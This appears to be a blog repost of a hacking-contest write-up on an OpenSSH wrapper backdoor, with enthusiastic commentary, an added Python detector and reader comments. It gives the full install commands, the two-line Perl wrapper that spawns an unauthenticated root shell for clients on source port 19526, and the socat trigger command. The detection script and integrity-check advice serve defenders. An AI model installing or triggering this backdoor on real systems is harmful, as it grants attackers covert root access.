@沈沉舟 posted a very interesting sshd backdoor (original at http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/). After reading it, I found it so elegant it is almost obscene.
The first thing init starts is /usr/sbin/sshd, which is the Perl script written by the attacker. When execution reaches the getpeername call, the regex match fails, so the script falls through to the next statement and launches /usr/bin/sshd, the original sshd. Once the original sshd, listening on its port, has accepted a TCP connection, it forks a child process to do the actual work. That child performs no check at all; it simply re-executes /usr/sbin/sshd at the system's default location, which hands control back to the Perl script. At this point the child's standard input and output have already been redirected to the socket, so getpeername really does obtain the client's TCP source port; if that port is 19526, the script executes sh and hands out a shell. On where 19526 comes from, the author says it is "the string "LF" converted from ASCII to a big-endian 16 bit integer", and this part can be changed.
Light and ingenious; breathtaking. The original post follows:
[Hacking-Contest] SSH Server wrapper
This blogpost shows how the SSH server can be replaced with a small wrapper script to allow full unauthenticated remote root access without disturbing the normal operation of the service. In order to install the wrapper script, the original SSH server must be renamed or moved to another directory. I have chosen to just move the binary from /usr/sbin/ to /usr/bin/:
cd /usr/sbin
mv sshd ../bin
vi sshd

Then type in the following small wrapper script:

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

Finally the wrapper script must be made executable e.g. with the following command:

chmod 755 sshd

In the normal operation of the ssh server, the wrapper script just executes the original sshd binary (which has been moved to /usr/bin/sshd) with all the given command-line arguments. If STDIN is a socket and the source port of the connected client happens to be 19526 (the string “LF” converted from ASCII to a big-endian 16 bit integer), the wrapper however executes /bin/sh instead, which gives the client an unauthenticated remote root shell.
Like many other network services, the OpenSSH server forks a new child process when receiving a new TCP connection. However, contrary to most other services, it doesn’t directly serve the client in the child process after the fork. Instead it re-executes its own binary (typically /usr/sbin/sshd) in the child process so that the client is handled by a new instance of the sshd process (which makes ASLR more effective by giving each child process a different randomized memory layout). For this child process, the file descriptors STDIN/STDOUT are connected to the client socket.
In order to exploit the backdoor to get a remote root shell, you have to connect to the SSH service from source port 19526, which can easily be achieved with the following command:
socat STDIO TCP4:target_ip:22,sourceport=19526
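The wrapper described above leaves two durable artifacts on disk: the file at the daemon's install path is an interpreter script rather than an ELF binary, and its text contains a peer-address check feeding an exec of a shell plus a re-exec of a second sshd binary. The following Python script is an added defensive example (not code from the original post, nor from Jakob Lell or OpenSSH) that checks for exactly those traits and also verifies that any running sshd process was loaded from the expected install path. The default path /usr/sbin/sshd comes from the post; the SUSPICIOUS_PATTERNS names, the Finding class and the sample inputs are constructed for this example.

```python
"""Audit the sshd install path for a script wrapper of the kind described above.

Added defensive example, not code from the original post. Assumes a Linux
host where the genuine sshd is an ELF binary installed at /usr/sbin/sshd.
"""
import os
import re
from dataclasses import dataclass, field

ELF_MAGIC = b"\x7fELF"
EXPECTED_SSHD = "/usr/sbin/sshd"

# The post derives the trigger port from the ASCII bytes "LF" read as a
# big-endian 16-bit integer; a network detection can key on the same value.
WRAPPER_SOURCE_PORT = int.from_bytes(b"LF", "big")  # 19526

# Constructed regexes matching the traits of the wrapper quoted in the post.
SUSPICIOUS_PATTERNS = {
    "peer_check": re.compile(r"getpeername\s*\("),
    "shell_exec": re.compile(r"exec\s*\(?\s*[\"']/bin/(?:ba)?sh[\"']"),
    "reexec_sshd": re.compile(r"exec\s*\{\s*[\"'][^\"']*sshd[\"']\s*\}"),
}


@dataclass
class Finding:
    kind: str                      # "elf", "script" or "unknown"
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def classify(data: bytes) -> str:
    """Classify file content by its leading bytes."""
    if data.startswith(ELF_MAGIC):
        return "elf"
    if data.startswith(b"#!"):
        return "script"
    return "unknown"


def inspect_sshd_content(data: bytes) -> Finding:
    """Flag content that is not an ELF binary and matches wrapper traits."""
    kind = classify(data)
    finding = Finding(kind=kind)
    if kind == "elf":
        return finding
    if kind == "script":
        finding.reasons.append("sshd path holds an interpreter script, not an ELF binary")
    else:
        finding.reasons.append("sshd path holds neither an ELF binary nor a script")
    text = data.decode("utf-8", errors="replace")
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(text):
            finding.reasons.append(f"matches wrapper pattern '{name}'")
    return finding


def inspect_sshd_path(path: str = EXPECTED_SSHD) -> Finding:
    """Read the on-disk sshd (header plus any short script suffices) and inspect it."""
    with open(path, "rb") as fh:
        return inspect_sshd_content(fh.read(64 * 1024))


def relocated_sshd_processes(proc_root: str = "/proc", expected: str = EXPECTED_SSHD):
    """Return (pid, exe) for sshd processes whose executable is not at the expected path.

    With the wrapper installed, the real daemon runs from the moved binary
    (/usr/bin/sshd in the post), so /proc/<pid>/exe no longer matches.
    """
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:
            exe = os.readlink(f"{proc_root}/{pid}/exe")
        except OSError:
            continue  # not ours to read, or the process has exited
        if os.path.basename(exe) == "sshd" and exe != expected:
            hits.append((int(pid), exe))
    return hits


# Constructed sample inputs; the wrapper text is the one quoted in the post.
SAMPLE_WRAPPER = (b'#!/usr/bin/perl\n'
                  b'exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);\n'
                  b'exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;\n')
SAMPLE_ELF = b"\x7fELF\x02\x01\x01" + b"\x00" * 57  # ELF64 e_ident padded out

if __name__ == "__main__":
    for label, blob in (("wrapper", SAMPLE_WRAPPER), ("elf", SAMPLE_ELF)):
        f = inspect_sshd_content(blob)
        print(label, f.kind, "SUSPICIOUS" if f.suspicious else "ok", f.reasons)
    if os.path.exists(EXPECTED_SSHD):
        print("on-disk:", inspect_sshd_path())
        print("relocated sshd processes:", relocated_sshd_processes())
```

The on-disk check is the reliable one: the Perl stage of the wrapper lives only for the instant between the child's exec and its own exec, so a process scan will rarely catch it, whereas the script at /usr/sbin/sshd is always present. On package-managed hosts, `dpkg -V openssh-server` or `rpm -V openssh-server` gives an independent integrity check that reports the moved and replaced binary.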
I still feel the old site had more character; it's all WordPress now, and I'm lost...
I can't be bothered to maintain the old site; writing the code myself is a pain.
No idea what this is, but it sounds impressive.
Interesting.